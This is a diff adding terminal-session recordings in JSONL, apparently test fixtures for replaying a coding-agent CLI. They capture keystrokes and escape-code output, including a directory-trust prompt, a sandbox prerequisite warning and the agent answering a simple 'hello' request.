|
||||
{"keyAt":true,"data":"i"}
|
||||
{"keyAt":true,"data":"t"}
|
||||
{"keyAt":true,"data":"h"}
|
||||
{"keyAt":true,"data":" "}
|
||||
{"keyAt":true,"data":"t"}
|
||||
{"keyAt":true,"data":"h"}
|
||||
{"keyAt":true,"data":"e"}
|
||||
{"keyAt":true,"data":" "}
|
||||
{"keyAt":true,"data":"s"}
|
||||
{"keyAt":true,"data":"i"}
|
||||
{"keyAt":true,"data":"n"}
|
||||
{"keyAt":true,"data":"g"}
|
||||
{"keyAt":true,"data":"l"}
|
||||
{"keyAt":true,"data":"e"}
|
||||
{"keyAt":true,"data":" "}
|
||||
{"keyAt":true,"data":"w"}
|
||||
{"keyAt":true,"data":"o"}
|
||||
{"keyAt":true,"data":"r"}
|
||||
{"keyAt":true,"data":"d"}
|
||||
{"keyAt":true,"data":" "}
|
||||
{"keyAt":true,"data":"h"}
|
||||
{"keyAt":true,"data":"e"}
|
||||
{"keyAt":true,"data":"l"}
|
||||
{"keyAt":true,"data":"l"}
|
||||
{"keyAt":true,"data":"o"}
|
||||
{"delayMs":2010,"data":"reply with the single word hello\u001b[K\u001b[17;82H\u001b[K\u001b[15;35H"}
|
||||
{"keyAt":true,"data":"\r"}
|
||||
{"delayMs":382,"data":"\u001b[13;30r\u001b[13;1H\u001bM\u001bM\u001bM\u001bM\u001b[1;30r\u001b[15;1H"}
|
||||
{"delayMs":0,"data":"\u001b[1m\u001b[2m› \u001b(B\u001b[mreply with the single word hello\r\n"}
|
||||
{"delayMs":0,"data":"\u001b[19;3H\u001b[2mUse /skills to list available skills\u001b(B\u001b[m\u001b[K\u001b[21;82H\u001b[K\u001b[19;3H"}
|
||||
{"delayMs":0,"data":"\u001b[36C\u001b[K\u001b[21;82H\u001b[K\u001b[19;3H"}
|
||||
{"delayMs":20,"data":"\u001b[36C\u001b[K\u001b[21;82H\u001b[K\u001b[19;3H"}
|
||||
{"delayMs":8,"data":"\u001b[36C\u001b[K\u001b[21;82H\u001b[K\u001b[19;3H"}
|
||||
{"delayMs":78,"data":"\u001b[?25l\u001b[?12l\u001b[?25h"}
|
||||
{"delayMs":0,"data":"\u001b[18;1H\u001b[J\u001b[A\u001b[K"}
|
||||
{"delayMs":0,"data":"\r\n•\u001b[C\u001b[2mWor\u001b(B\u001b[mk\u001b[1ming\u001b[C\u001b(B\u001b[m\u001b[2m(0s • esc to interrupt)\u001b[21;1H\u001b(B\u001b[m\u001b[1m›\u001b[C\u001b(B\u001b[m\u001b[2mUse /skills to list available skills\u001b[23;3H\u001b(B\u001b[m\u001b[38;5;223mgpt-5.6-terra default\u001b[39m\u001b[2m · \u001b(B\u001b[m\u001b[38;5;151m~/default/claudeman-predictive/tmp/codexrec-work-SFpno1\u001b[21;3H\u001b(B\u001b[m"}
|
||||
{"delayMs":33,"data":"\u001b[18;34H\u001b[K\u001b[21;39H\u001b[K\u001b[23;82H\u001b[K\u001b[21;3H"}
|
||||
{"delayMs":33,"data":"\u001b[?25l\u001b[?12l\u001b[?25h"}
|
||||
{"delayMs":0,"data":"\u001b[18;6H\u001b[2mk\u001b(B\u001b[mi\u001b[26C\u001b[K\u001b[21;39H\u001b[K\u001b[23;82H\u001b[K\u001b[21;3H"}
|
||||
{"delayMs":34,"data":"\u001b[18;34H\u001b[K\u001b[21;39H\u001b[K\u001b[23;82H\u001b[K\u001b[21;3H"}
|
||||
{"delayMs":35,"data":"\u001b[18;7H\u001b[2mi\u001b(B\u001b[mn\u001b[25C\u001b[K\u001b[21;39H\u001b[K\u001b[23;82H\u001b[K\u001b[21;3H"}
|
||||
{"delayMs":33,"data":"\u001b[?25l\u001b[?12l\u001b[?25h\u001b[18;34H\u001b[K\u001b[21;39H\u001b[K\u001b[23;82H\u001b[K\u001b[21;3H"}
|
||||
{"delayMs":33,"data":"\u001b[18;8H\u001b[2mn\u001b(B\u001b[mg\u001b[24C\u001b[K\u001b[21;39H\u001b[K\u001b[23;82H\u001b[K\u001b[21;3H"}
|
||||
{"delayMs":33,"data":"\u001b[18;34H\u001b[K\u001b[21;39H\u001b[K\u001b[23;82H\u001b[K\u001b[21;3H"}
|
||||
{"delayMs":33,"data":"\u001b[?25l\u001b[?12l\u001b[?25h"}
|
||||
{"delayMs":0,"data":"\u001b[18;9H\u001b[2mg\u001b(B\u001b[m\u001b[24C\u001b[K\u001b[21;39H\u001b[K\u001b[23;82H\u001b[K\u001b[21;3H"}
|
||||
{"delayMs":34,"data":"\u001b[18;34H\u001b[K\u001b[21;39H\u001b[K\u001b[23;82H\u001b[K\u001b[21;3H"}
|
||||
{"delayMs":34,"data":"\u001b[18;34H\u001b[K\u001b[21;39H\u001b[K\u001b[23;82H\u001b[K\u001b[21;3H"}
|
||||
{"delayMs":33,"data":"\u001b[?25l\u001b[?12l\u001b[?25h"}
|
||||
{"delayMs":0,"data":"\u001b[18;34H\u001b[K\u001b[21;39H\u001b[K\u001b[23;82H\u001b[K\u001b[21;3H"}
|
||||
{"delayMs":33,"data":"\u001b[18;34H\u001b[K\u001b[21;39H\u001b[K\u001b[23;82H\u001b[K\u001b[21;3H"}
|
||||
{"delayMs":33,"data":"\u001b[18;34H\u001b[K\u001b[21;39H\u001b[K\u001b[23;82H\u001b[K\u001b[21;3H"}
|
||||
{"delayMs":33,"data":"\u001b[?25l\u001b[?12l\u001b[?25h"}
|
||||
{"delayMs":0,"data":"\u001b[18;34H\u001b[K\u001b[21;39H\u001b[K\u001b[23;82H\u001b[K\u001b[21;3H"}
|
||||
{"delayMs":33,"data":"\u001b[18;34H\u001b[K\u001b[21;39H\u001b[K\u001b[23;82H\u001b[K\u001b[21;3H"}
|
||||
{"delayMs":33,"data":"\u001b[18;34H\u001b[K\u001b[21;39H\u001b[K\u001b[23;82H\u001b[K\u001b[21;3H"}
|
||||
{"delayMs":33,"data":"\u001b[?25l\u001b[?12l\u001b[?25h\u001b[18;34H\u001b[K\u001b[21;39H\u001b[K\u001b[23;82H\u001b[K\u001b[21;3H"}
|
||||
{"delayMs":33,"data":"\u001b[18;34H\u001b[K\u001b[21;39H\u001b[K\u001b[23;82H\u001b[K\u001b[18;1H\u001b[2m◦\u001b[21;3H\u001b(B\u001b[m"}
|
||||
{"delayMs":34,"data":"\u001b[18;34H\u001b[K\u001b[21;39H\u001b[K\u001b[23;82H\u001b[K\u001b[21;3H"}
|
||||
{"delayMs":33,"data":"\u001b[?25l\u001b[?12l\u001b[?25h"}
|
||||
{"delayMs":0,"data":"\u001b[18;34H\u001b[K\u001b[21;39H\u001b[K\u001b[23;82H\u001b[K\u001b[21;3H"}
|
||||
{"delayMs":33,"data":"\u001b[18;34H\u001b[K\u001b[21;39H\u001b[K\u001b[23;82H\u001b[K\u001b[21;3H"}
|
||||
{"delayMs":32,"data":"\u001b[18;34H\u001b[K\u001b[21;39H\u001b[K\u001b[23;82H\u001b[K\u001b[21;3H"}
|
||||
{"delayMs":33,"data":"\u001b[?25l\u001b[?12l\u001b[?25h\u001b[18;34H\u001b[K\u001b[21;39H\u001b[K\u001b[23;82H\u001b[K\u001b[21;3H"}
|
||||
{"delayMs":33,"data":"\u001b[18;34H\u001b[K\u001b[21;39H\u001b[K\u001b[23;82H\u001b[K\u001b[21;3H"}
|
||||
{"delayMs":34,"data":"\u001b[18;34H\u001b[K\u001b[21;39H\u001b[K\u001b[23;82H\u001b[K\u001b[21;3H"}
|
||||
{"delayMs":33,"data":"\u001b[?25l\u001b[?12l\u001b[?25h\u001b[18;34H\u001b[K\u001b[21;39H\u001b[K\u001b[23;82H\u001b[K\u001b[21;3H"}
|
||||
{"delayMs":34,"data":"\u001b[18;34H\u001b[K\u001b[21;39H\u001b[K\u001b[23;82H\u001b[K\u001b[21;3H"}
|
||||
{"delayMs":33,"data":"\u001b[18;34H\u001b[K\u001b[21;39H\u001b[K\u001b[23;82H\u001b[K\u001b[21;3H"}
|
||||
{"delayMs":33,"data":"\u001b[?25l\u001b[?12l\u001b[?25h"}
|
||||
{"delayMs":0,"data":"\u001b[18;34H\u001b[K\u001b[21;39H\u001b[K\u001b[23;82H\u001b[K\u001b[21;3H"}
|
||||
{"delayMs":33,"data":"\u001b[18;12H\u001b[2m1\u001b(B\u001b[m\u001b[21C\u001b[K\u001b[21;39H\u001b[K\u001b[23;82H\u001b[K\u001b[21;3H"}
|
||||
{"delayMs":33,"data":"\u001b[18;34H\u001b[K\u001b[21;39H\u001b[K\u001b[23;82H\u001b[K\u001b[21;3H"}
|
||||
{"delayMs":33,"data":"\u001b[18;34H\u001b[K\u001b[21;39H\u001b[K\u001b[23;82H\u001b[K\u001b[21;3H"}
|
||||
{"delayMs":0,"data":"\u001b[?25l\u001b[?12l\u001b[?25h"}
|
||||
{"delayMs":33,"data":"\u001b[18;34H\u001b[K\u001b[21;39H\u001b[K\u001b[23;82H\u001b[K\u001b[21;3H"}
|
||||
{"delayMs":34,"data":"\u001b[18;34H\u001b[K\u001b[21;39H\u001b[K\u001b[23;82H\u001b[K\u001b[21;3H"}
|
||||
{"delayMs":34,"data":"\u001b[?25l\u001b[?12l\u001b[?25h"}
|
||||
{"delayMs":0,"data":"\u001b[18;34H\u001b[K\u001b[21;39H\u001b[K\u001b[23;82H\u001b[K\u001b[21;3H"}
|
||||
{"delayMs":32,"data":"\u001b[18;34H\u001b[K\u001b[21;39H\u001b[K\u001b[23;82H\u001b[K\u001b[18;1H•\u001b[21;3H"}
|
||||
{"delayMs":33,"data":"\u001b[18;34H\u001b[K\u001b[21;39H\u001b[K\u001b[23;82H\u001b[K\u001b[21;3H"}
|
||||
{"delayMs":34,"data":"\u001b[?25l\u001b[?12l\u001b[?25h\u001b[18;34H\u001b[K\u001b[21;39H\u001b[K\u001b[23;82H\u001b[K\u001b[21;3H"}
|
||||
{"delayMs":34,"data":"\u001b[3AW\u001b[30C\u001b[K\u001b[21;39H\u001b[K\u001b[23;82H\u001b[K\u001b[21;3H"}
|
||||
{"delayMs":33,"data":"\u001b[18;34H\u001b[K\u001b[21;39H\u001b[K\u001b[23;82H\u001b[K\u001b[21;3H"}
|
||||
{"delayMs":33,"data":"\u001b[?25l\u001b[?12l\u001b[?25h"}
|
||||
{"delayMs":0,"data":"\u001b[18;34H\u001b[K\u001b[21;39H\u001b[K\u001b[23;82H\u001b[K\u001b[21;3H"}
|
||||
{"delayMs":33,"data":"\u001b[3A\u001b[1mW\u001b(B\u001b[mo\u001b[29C\u001b[K\u001b[21;39H\u001b[K\u001b[23;82H\u001b[K\u001b[21;3H"}
|
||||
{"delayMs":33,"data":"\u001b[18;34H\u001b[K\u001b[21;39H\u001b[K\u001b[23;82H\u001b[K\u001b[21;3H"}
|
||||
{"delayMs":33,"data":"\u001b[?25l\u001b[?12l\u001b[?25h"}
|
||||
{"delayMs":0,"data":"\u001b[18;4H\u001b[1mo\u001b(B\u001b[mr\u001b[28C\u001b[K\u001b[21;39H\u001b[K\u001b[23;82H\u001b[K\u001b[21;3H"}
|
||||
{"delayMs":33,"data":"\u001b[18;34H\u001b[K\u001b[21;39H\u001b[K\u001b[23;82H\u001b[K\u001b[21;3H"}
|
||||
{"delayMs":33,"data":"\u001b[18;5H\u001b[1mr\u001b(B\u001b[mk\u001b[27C\u001b[K\u001b[21;39H\u001b[K\u001b[23;82H\u001b[K\u001b[21;3H"}
|
||||
{"delayMs":33,"data":"\u001b[?25l\u001b[?12l\u001b[?25h"}
|
||||
{"delayMs":0,"data":"\u001b[18;34H\u001b[K\u001b[21;39H\u001b[K\u001b[23;82H\u001b[K\u001b[21;3H"}
|
||||
{"delayMs":33,"data":"\u001b[18;6H\u001b[1mk\u001b(B\u001b[mi\u001b[26C\u001b[K\u001b[21;39H\u001b[K\u001b[23;82H\u001b[K\u001b[21;3H"}
|
||||
{"delayMs":32,"data":"\u001b[18;1H\u001b[J\u001b[A\u001b[K"}
|
||||
{"delayMs":0,"data":"\u001b[17;30r\u001b[17;1H\u001bM\u001bM\u001b[1;30r\u001b[18;1H"}
|
||||
{"delayMs":0,"data":"\u001b[2m• \u001b(B\u001b[mhello\u001b[21;1H\u001b[1m›\u001b[C\u001b(B\u001b[m\u001b[2mUse /skills to list available skills\u001b[23;3H\u001b(B\u001b[m\u001b[38;5;223mgpt-5.6-terra default\u001b[39m\u001b[2m · \u001b(B\u001b[m\u001b[38;5;151m~/default/claudeman-predictive/tmp/codexrec-work-SFpno1\u001b[21;3H\u001b(B\u001b[m"}
|
||||
{"delayMs":25,"data":"\u001b[?25l\u001b[?12l\u001b[?25h"}
|
||||
{"delayMs":0,"data":"\u001b[36C\u001b[K\u001b[23;82H\u001b[K\u001b[21;3H"}
|
||||
{"delayMs":6,"data":"\u001b[?25l\u001b[?12l\u001b[?25h"}
|
||||
{"delayMs":3,"data":"\u001b[36C\u001b[K\u001b[23;82H\u001b[K\u001b[21;3H"}
|
||||
{"keyAt":true,"data":"a"}
|
||||
{"delayMs":2252,"data":"a\u001b[K\u001b[23;82H\u001b[K\u001b[21;4H"}
|
||||
{"keyAt":true,"data":"b"}
|
||||
{"delayMs":121,"data":"b\u001b[K\u001b[23;82H\u001b[K\u001b[21;5H"}
|
||||
{"keyAt":true,"data":"c"}
|
||||
{"delayMs":121,"data":"c\u001b[K\u001b[23;82H\u001b[K\u001b[21;6H"}
|
||||
@@ -0,0 +1,28 @@
|
||||
{"scenario":"trust-modal","cols":100,"rows":30,"codexVersion":"codex-cli 0.147.0","recordedAt":"2026-08-09T01:51:20.960Z"}
|
||||
{"delayMs":0,"data":"\u001b[22;0;0t\u001b[?1h\u001b=\u001b[H\u001b[2J\u001b[?12l\u001b[?25h\u001b[?2004h\u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[1;1H\u001b[1;30r\u001b[c\u001b[>c\u001b[>q\u001b]10;?\u001b\\\u001b]11;?\u001b\\\u001b[1;1H"}
|
||||
{"delayMs":0,"data":"\u001b[?25l\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\u001b[?12l\u001b[?25h\u001b[H"}
|
||||
{"delayMs":0,"data":"\u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[1;1H\u001b[1;30r\u001b[1;1H"}
|
||||
{"delayMs":0,"data":"\u001b[?25l\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\u001b[?12l\u001b[?25h\u001b[H"}
|
||||
{"delayMs":28,"data":"\u001b[32m\u001b[1markon@tnode\u001b(B\u001b[m:\u001b[34m\u001b[1m~/default/claudeman-predictive/tmp/codexrec-work-X4gHpE\u001b(B\u001b[m$ "}
|
||||
{"delayMs":654,"data":"exec codex\r\n"}
|
||||
{"delayMs":486,"data":"\u001b[?25l\u001b[?12l\u001b[?25h"}
|
||||
{"delayMs":168,"data":"\u001b[30d\n\u001b[K\u001b[2d\u001b[J\u001b[H\u001b[K"}
|
||||
{"delayMs":2,"data":">\u001b[C\u001b[1mYou are in \u001b(B\u001b[m/home/arkon/default/claudeman-predictive/tmp/codexrec-work-X4gHpE\u001b[3;3H\u001b[33mNote: You’re in a subdirectory of a Git project. Trusting will apply to the repository root:\u001b[4;3H/home/arkon/default/claudeman\u001b[6;3H\u001b[39mDo\u001b[Cyou\u001b[Ctrust\u001b[Cthe\u001b[Ccontents\u001b[Cof\u001b[Cthis\u001b[Cdirectory?\u001b[CWorking\u001b[Cwith\u001b[Cuntrusted\u001b[Ccontents\u001b[Ccomes\u001b[Cwith\u001b[Chigher\u001b[7;3Hrisk\u001b[Cof\u001b[Cprompt\u001b[Cinjection.\u001b[CTrusting\u001b[Cthe\u001b[Cdirectory\u001b[Callows\u001b[Cproject-local\u001b[Cconfig,\u001b[Chooks,\u001b[Cand\u001b[Cexec\u001b[8;3Hpolicies\u001b[Cto\u001b[Cload.\u001b[10;1H\u001b[36m› 1. Yes, continue\u001b[11;3H\u001b[39m2.\u001b[CNo,\u001b[Cquit\u001b[13;3H\u001b[2mPress enter to continue\u001b[?25l\u001b(B\u001b[m"}
|
||||
{"delayMs":3659,"data":"\u001b[?7727h\u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[1;1H\u001b[1;30r\u001b[13;26H\u001b[?25l"}
|
||||
{"delayMs":0,"data":"\u001b[H>\u001b[1X\u001b[1m\u001b[CYou are in \u001b(B\u001b[m/home/arkon/default/claudeman-predictive/tmp/codexrec-work-X4gHpE\u001b[K\r\n\u001b[K\u001b[3;2H\u001b[1K\u001b[33m\u001b[CNote: You’re in a subdirectory of a Git project. Trusting will apply to the repository root:\u001b[39m\u001b[K\u001b[4;2H\u001b[1K\u001b[33m\u001b[C/home/arkon/default/claudeman\u001b[39m\u001b[K\r\n\u001b[K\u001b[6;2H\u001b[1K\u001b[CDo\u001b[1X\u001b[Cyou\u001b[1X\u001b[Ctrust\u001b[1X\u001b[Cthe\u001b[1X\u001b[Ccontents\u001b[1X\u001b[Cof\u001b[1X\u001b[Cthis\u001b[1X\u001b[Cdirectory?\u001b[1X\u001b[CWorking\u001b[1X\u001b[Cwith\u001b[1X\u001b[Cuntrusted\u001b[1X\u001b[Ccontents\u001b[1X\u001b[Ccomes\u001b[1X\u001b[Cwith\u001b[1X\u001b[Chigher\u001b[K\u001b[7;2H\u001b[1K\u001b[Crisk\u001b[1X\u001b[Cof\u001b[1X\u001b[Cprompt\u001b[1X\u001b[Cinjection.\u001b[1X\u001b[CTrusting\u001b[1X\u001b[Cthe\u001b[1X\u001b[Cdirectory\u001b[1X\u001b[Callows\u001b[1X\u001b[Cproject-local\u001b[1X\u001b[Cconfig,\u001b[1X\u001b[Chooks,\u001b[1X\u001b[Cand\u001b[1X\u001b[Cexec\u001b[K\u001b[8;2H\u001b[1K\u001b[Cpolicies\u001b[1X\u001b[Cto\u001b[1X\u001b[Cload.\u001b[K\r\n\u001b[K\u001b[36m\r\n› 1. Yes, continue\u001b[39m\u001b[K\u001b[11;2H\u001b[1K\u001b[C2.\u001b[1X\u001b[CNo,\u001b[1X\u001b[Cquit\u001b[K\r\n\u001b[K\u001b[13;2H\u001b[1K\u001b[2m\u001b[CPress enter to continue\u001b(B\u001b[m\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\u001b[13;26H"}
|
||||
{"keyAt":true,"data":"x"}
|
||||
{"delayMs":188,"data":"\u001b[1;79H\u001b[K\u001b[3;95H\u001b[K\u001b[4;32H\u001b[K\u001b[6;97H\u001b[K\u001b[7;96H\u001b[K\u001b[8;20H\u001b[K\u001b[10;19H\u001b[K\u001b[11;14H\u001b[K\u001b[13;26H\u001b[K\u001b[30;2H"}
|
||||
{"keyAt":true,"data":"\r"}
|
||||
{"delayMs":849,"data":"\u001b[2;1H\u001b[J\u001b[H\u001b[K"}
|
||||
{"delayMs":0,"data":"\u001bM\u001bM\u001bM\r\n\u001b[33m⚠ Codex could not find bubblewrap on PATH. Install bubblewrap with your OS package manager. See the\r\n\u001b(B\u001b[m\u001b[1;3r\u001b[3;1H\n\u001b[A \u001b[33msandbox prerequisites: https://developers.openai.com/codex/concepts/sandboxing#prerequisites.\u001b[39m\r\n\u001b[K\u001b[1;30r\u001b[3;1H"}
|
||||
{"delayMs":2,"data":" \u001b[33mCodex will use the bundled bubblewrap in the meantime.\u001b[5;1H\u001b[39m\u001b[2m╭─────────────────────────────────────────────────╮\r\n│ >_ \u001b(B\u001b[m\u001b[1mOpenAI Codex\u001b(B\u001b[m\u001b[2m (v0.147.0) │\r\n│ │\r\n│ model: \u001b[3mloading\u001b(B\u001b[m\u001b[2m \u001b(B\u001b[m\u001b[36m/model\u001b[39m\u001b[2m to change │\r\n│ directory: \u001b(B\u001b[m~/default/…/tmp/codexrec-work-X4gHpE\u001b[2m │\r\n╰─────────────────────────────────────────────────╯\u001b[13;1H\u001b(B\u001b[m\u001b[1m›\u001b[C\u001b(B\u001b[m\u001b[2mImprove docum\u001b(B\u001b[m"}
|
||||
{"delayMs":0,"data":"\u001b[2mentation in @filename\u001b[15;3H\u001b(B\u001b[m\u001b[38;5;223mgpt-5.6-sol default\u001b[39m\u001b[2m · \u001b(B\u001b[m\u001b[38;5;151m~/default/claudeman-predictive/tmp/codexrec-work-X4gHpE\u001b[13;3H\u001b[?12l\u001b[?25h\u001b(B\u001b[m"}
|
||||
{"delayMs":7,"data":"\u001b[5;52H\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\u001b[13;37H\u001b[K\u001b[15;80H\u001b[K\u001b[13;3H"}
|
||||
{"delayMs":13,"data":"\u001b[5;52H\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\u001b[13;37H\u001b[K\u001b[15;80H\u001b[K\u001b[13;3H"}
|
||||
{"delayMs":165,"data":"\u001b[5;1H\u001b[J\u001b[A\u001b[K"}
|
||||
{"delayMs":0,"data":"\u001b[2B\u001b[1m›\u001b[C\u001b(B\u001b[m\u001b[2mImprove documentation in @filename\u001b[8;3H\u001b(B\u001b[m\u001b[38;5;223mgpt-5.6-sol default\u001b[39m\u001b[2m · \u001b(B\u001b[m\u001b[38;5;151m~/default/claudeman-predictive/tmp/codexrec-work-X4gHpE\u001b[6;3H\u001b(B\u001b[m"}
|
||||
{"delayMs":1,"data":"\u001b[34C\u001b[K\u001b[8;80H\u001b[K\u001b[6;3H"}
|
||||
{"delayMs":24,"data":"\u001b[4;30r\u001b[4;1H\u001bM\u001bM\u001bM\u001bM\u001bM\u001bM\u001bM\u001bM\u001bM\u001bM\u001bM\r\n\u001b[2m╭─────────────────────────────────────────────────╮\r\n│ >_ \u001b(B\u001b[m\u001b[1mOpenAI Codex\u001b(B\u001b[m\u001b[2m (v0.147.0) │\u001b[1;30r\u001b[7;1H\u001b(B\u001b[m"}
|
||||
{"delayMs":0,"data":"\u001b[2m│ │\r\n│ model: \u001b(B\u001b[mgpt-5.6-sol\u001b[2m \u001b(B\u001b[m\u001b[36m/model\u001b[39m\u001b[2m to change │\r\n│ directory: \u001b(B\u001b[m~/default/…/tmp/codexrec-work-X4gHpE\u001b[2m │\r\n╰─────────────────────────────────────────────────╯\u001b[12;1H\u001b(B\u001b[m \u001b[1mTip:\u001b(B\u001b[m Our most capable model yet. GPT-5.6 Sol can tackle complex code changes, dig into research,\r\n produce polished documents, and take on your most ambitious work. Sol is highly capable at lower\r\n"}
|
||||
{"delayMs":0,"data":" reasoning efforts—try starting lower, then turn it up for harder jobs.\u001b[17;37H\u001b[K\u001b[19;80H\u001b[K\u001b[17;3H"}
|
||||
{"delayMs":1,"data":"\u001b[34C\u001b[K\u001b[19;80H\u001b[K\u001b[17;3H"}
|
||||
@@ -0,0 +1,33 @@
|
||||
{"scenario":"type-hello","cols":100,"rows":30,"codexVersion":"codex-cli 0.147.0","recordedAt":"2026-08-09T01:50:33.854Z"}
|
||||
{"delayMs":0,"data":"\u001b[22;0;0t\u001b[?1h\u001b=\u001b[H\u001b[2J\u001b[?12l\u001b[?25h\u001b[?2004h\u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[1;1H\u001b[1;30r\u001b[c\u001b[>c\u001b[>q\u001b]10;?\u001b\\\u001b]11;?\u001b\\\u001b[1;1H"}
|
||||
{"delayMs":1,"data":"\u001b[?25l\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\u001b[?12l\u001b[?25h\u001b[H\u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[1;1H\u001b[1;30r\u001b[1;1H\u001b[?25l\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\u001b[?12l\u001b[?25h\u001b[H"}
|
||||
{"delayMs":32,"data":"\u001b[32m\u001b[1markon@tnode\u001b(B\u001b[m:\u001b[34m\u001b[1m~/default/claudeman-predictive/tmp/codexrec-work-tXbGez\u001b(B\u001b[m$ "}
|
||||
{"delayMs":651,"data":"exec codex\r\n"}
|
||||
{"delayMs":403,"data":"\u001b[?25l\u001b[?12l\u001b[?25h"}
|
||||
{"delayMs":189,"data":"\u001b[?25l\u001b[?12l\u001b[?25h"}
|
||||
{"delayMs":7,"data":"\r\n\u001b[J\u001b[A\u001b[K"}
|
||||
{"delayMs":4,"data":"\u001b[2;30r\u001b[2;1H\u001bM\u001bM\u001bM\u001b[1;30r\u001b[2;1H\u001b[33m⚠ Codex could not find bubblewrap on PATH. Install bubblewrap with your OS package manager. See the\r\n\u001b[39m \u001b[33msandbox prerequisites: https://developers.openai.com/codex/concepts/sandboxing#prerequisites.\r\n\u001b[39m \u001b[33mCodex will use the bundled bubblewrap in the meantime.\u001b[6;1H\u001b[39m\u001b[2m╭─────────────────────────────────────────────────╮\r\n│ >_ \u001b(B\u001b[m\u001b[1mOpenAI Codex\u001b(B\u001b[m\u001b[2m (v0.147.0) │\r\n│ │\r\n│ model: \u001b[3mloading\u001b(B\u001b[m\u001b[2m \u001b(B\u001b[m\u001b[36m/model\u001b[39m\u001b[2m to change │\r\n│ directory: \u001b(B\u001b[m~/default/…/tmp/codexrec-work-tXbGez\u001b[2m │\r\n╰─────────────────────────────────────────────────╯\u001b[14;1H\u001b(B\u001b[m\u001b[1m›\u001b[C\u001b(B\u001b[m\u001b[2mImprove documentation in @filename\u001b[16;3H\u001b(B\u001b[m\u001b[38;5;223mgpt-5.6-sol default\u001b[39m\u001b[2m · \u001b(B\u001b[m\u001b[38;5;151m~/default/claudeman-predictive/tmp/codexrec-work-tXbGez\u001b[14;3H\u001b(B\u001b[m"}
|
||||
{"delayMs":6,"data":"\u001b[6;52H\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\u001b[14;37H\u001b[K\u001b[16;80H\u001b[K\u001b[14;3H"}
|
||||
{"delayMs":25,"data":"\u001b[6;52H\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\u001b[14;37H\u001b[K\u001b[16;80H\u001b[K\u001b[14;3H"}
|
||||
{"delayMs":8,"data":"\u001b[6;52H\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\u001b[14;37H\u001b[K\u001b[16;80H\u001b[K\u001b[14;3H"}
|
||||
{"delayMs":185,"data":"\u001b[6;1H\u001b[J\u001b[A\u001b[K"}
|
||||
{"delayMs":0,"data":"\u001b[5;30r\u001b[5;1H\u001bM\u001bM\u001bM\u001bM\u001bM\u001bM\u001bM\u001bM\u001bM\u001bM\u001bM\u001b[1;30r\u001b[5;1H"}
|
||||
{"delayMs":0,"data":"\r\n\u001b[2m╭─────────────────────────────────────────────────╮\r\n\u001b(B\u001b[m"}
|
||||
{"delayMs":0,"data":"\u001b[2m│ >_ \u001b(B\u001b[m\u001b[1mOpenAI Codex\u001b(B\u001b[m\u001b[2m (v0.147.0) │\r\n│ │\r\n│ model: \u001b(B\u001b[mgpt-5.6-sol\u001b[2m \u001b(B\u001b[m\u001b[36m/model\u001b[39m\u001b[2m to change │\r\n\u001b(B\u001b[m"}
|
||||
{"delayMs":0,"data":"\u001b[2m│ directory: \u001b(B\u001b[m~/default/…/tmp/codexrec-work-tXbGez\u001b[2m │\r\n╰─────────────────────────────────────────────────╯\u001b[13;1H\u001b(B\u001b[m \u001b[1mTip:\u001b(B\u001b[m Our most capable model yet. GPT-5.6 Sol can tackle complex code changes, dig into research,\r\n"}
|
||||
{"delayMs":0,"data":" produce polished documents, and take on your most ambitious work. Sol is highly capable at lower\r\n"}
|
||||
